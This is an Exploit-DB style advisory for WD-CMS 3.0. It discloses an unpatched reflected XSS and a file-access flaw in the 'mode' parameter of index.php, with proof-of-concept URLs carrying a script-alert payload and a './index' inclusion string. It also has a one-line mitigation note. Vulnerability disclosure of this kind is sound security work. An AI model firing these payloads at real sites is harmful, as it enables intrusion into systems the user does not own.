WD-CMS 3.0 Multiple Vulnerabilities

vendor:

WD-CMS

by:

Sora

8,8

CVSS

HIGH

XSS and Remote File Access

79, 22

CWE

Product Name: WD-CMS

Affected Version From: 3.0

Affected Version To: 3.0

Patch Exists: NO

Related CWE: N/A

CPE: a:web_diamond:wd-cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows Vista and Linux (Backtrack 3)

2009

WD-CMS 3.0 Multiple Vulnerabilities

The CMS named WD-CMS developed by Web Diamond LTD has multiple vulnerabilities. Vulnerabilities include XSS and remote file access. XSS Proof of Concept: http://www.site.com/index.php?l=eng&mode=%3Cscript%3Ealert%28%22XSS%20by%20Sora%22%29%3C/script%3E Remote File Access Proof of Concept: http://www.site.com/index.php?l=eng&mode=./index (as it adds .php at the end)

Mitigation:

Input validation and sanitization should be done to prevent XSS and remote file access vulnerabilities.

Source

Exploit-DB raw data:

# Exploit Title: WD-CMS 3.0 Multiple Vulnerabilities
# Date: December 31st, 2009
# Author: Sora
# Software Link: http://www.webdiamond.net/cms.html
# Version: 3.0
# Tested on: Windows Vista and Linux (Backtrack 3)

---------------------------------------------------------------
> WD-CMS 3.0 Multiple Vulnerabilities
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: http://greyhathackers.wordpress.com/

--------------------------------------------------
# Program Description:
Based on a flexible PHP architecture, Web Diamond has developed a 100% browser-based database-driven Content Management System (CMS), which allows users to maintain full control of their website without any technical knowledge of programming by using a simple user friendly admin panel. The main benefit and the flexible strength of our CMS is its ability to separate design, structure and content. Each area of the site can be recreated and adjusted independent of the other areas.

Key features include:
1. User friendly secure admin interface
2. Access levels
3. Powerful File Manager
4. Multi languages
5. Dynamic templates
6. Search engine friendly
7. Site tools
8. Add-on modules


# Vulnerability Description:
The CMS named WD-CMS developed by Web Diamond LTD has multiple vulnerabilities.

Vulnerabilities: XSS and remote file access.

http://www.site.com/index.php?l=eng&mode=%3Cscript%3Ealert%28%22XSS%20by%20Sora%22%29%3C/script%3E

# Code/Proof of Concept (PoC):

XSS Proof of Concept:
http://www.site.com/index.php?l=eng&mode=%3Cscript%3Ealert%28%22XSS%20by%20Sora%22%29%3C/script%3E

Remote File Access Proof of Concept:
http://www.site.com/index.php?l=eng&mode=./index (as it adds .php at the end)

# Greetz:
Bw0mp, Popc0rn, Xermes, T3eS, Timeb0mb, [H]aruhiSuzumiya, Revelation, and Max Mafiotu!